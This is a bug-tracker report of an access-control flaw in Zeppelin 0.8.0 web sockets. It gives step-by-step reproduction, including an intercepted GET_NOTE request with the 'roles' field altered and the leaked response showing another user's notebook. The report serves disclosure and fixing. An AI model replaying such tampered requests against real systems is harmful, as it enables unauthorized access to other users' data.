Details
-
Bug
-
Status: Open
-
Major
-
Resolution: Unresolved
-
0.8.0
-
None
-
Easily reproducible in 0.8 zeppelin version with Simple web socket client google extension
Description
Zeppelin Notebook Role Access can be easily Bypassed and we can access Others notebook
The exploit is achieved using web sockets, as Zeppelin’s web sockets fails to validate if the active session of the user’s role, making the request, is allowed to access another user’s note/data. The Zeppelin web socket requests can be intercepted, by a malicious authenticated user, and the role value modified enabling access to the other user’s jobs/results.
Reproduction Steps:
The following is required to reproduce this finding:
1. Authentication to the Zeppelin service, using user1, as a valid "ticket” value is required by the web socket request.
(assume i logged in as akhil/akhil as basic authentication method of zeppelin)
2) open 'Simple Web Socket Client' - Chrome extension ( or use any interceptor tool like burp)
3) open a Random notebook . we can see Zeeplin-web client will be sending request
{"op":"GET_NOTE","data":{"id":"2DWPTEZCW"},"principal":"admin","ticket":"de3a1427-6931-402d-9b31-2ca2797dcea5","roles":"[admin]"}
4) modify the above request > add a noteID which role admin doesnt have access, edit the role to
{"op":"GET_NOTE","data":{"id":"2DZETETMP"},"principal":"admin","ticket":"de3a1427-6931-402d-9b31-2ca2797dcea5","roles":"[akhil]"}
5) see the response from web scoket :
{"op":"GET_NOTE","data":{"id":"2DZETETMP"},"principal":"admin","ticket":"de3a1427-6931-402d-9b31-2ca2797dcea5","roles":"[akhil]"}
{"op":"NOTE","data":{"note":{"paragraphs":[{"text":"whoami","user":"akhil","dateUpdated":"2018-12-12T03:27:52+0000","config":{"colWidth":12.0,"enabled":true,"results":{},"editorSetting":{"editOnDblClick":false,"language":"sh"},"editorMode":"ace/mode/sh"},"settings":{"params":{},"forms":{}},"results":{"code":"SUCCESS","msg":[{"type":"TEXT","data":"zeppelin\n"}]},"apps":[],"jobName":"paragraph_1544585263373_-927336176","id":"20181212-032743_583387567","dateCreated":"2018-12-12T03:27:43+0000","dateStarted":"2018-12-12T03:27:52+0000","dateFinished":"2018-12-12T03:27:53+0000","status":"FINISHED","progressUpdateIntervalMs":500},{"user":"akhil","config":{},"settings":{"params":{},"forms":{}},"apps":[],"jobName":"paragraph_1544585272646_-198606435","id":"20181212-032752_1799562836","dateCreated":"2018-12-12T03:27:52+0000","status":"READY","progressUpdateIntervalMs":500}],"name":"Akhil Note","id":"2DZETETMP","angularObjects":{"2CHS8UYQQ:shared_process":[],"2CK8A9MEG:shared_process":[],"2CKAY1A8Y:shared_process":[],"2CKEKWY8Z:shared_process":[]},"config":{"isZeppelinNotebookCronEnable":false},"info":{}}},"ticket":"anonymous","principal":"anonymous","roles":""}
we will get whole details of notebook even though the JSESSIONID and ticket is authenticated against admin and admin doesnt have access to NOTEBOOK : 2DZETETMP
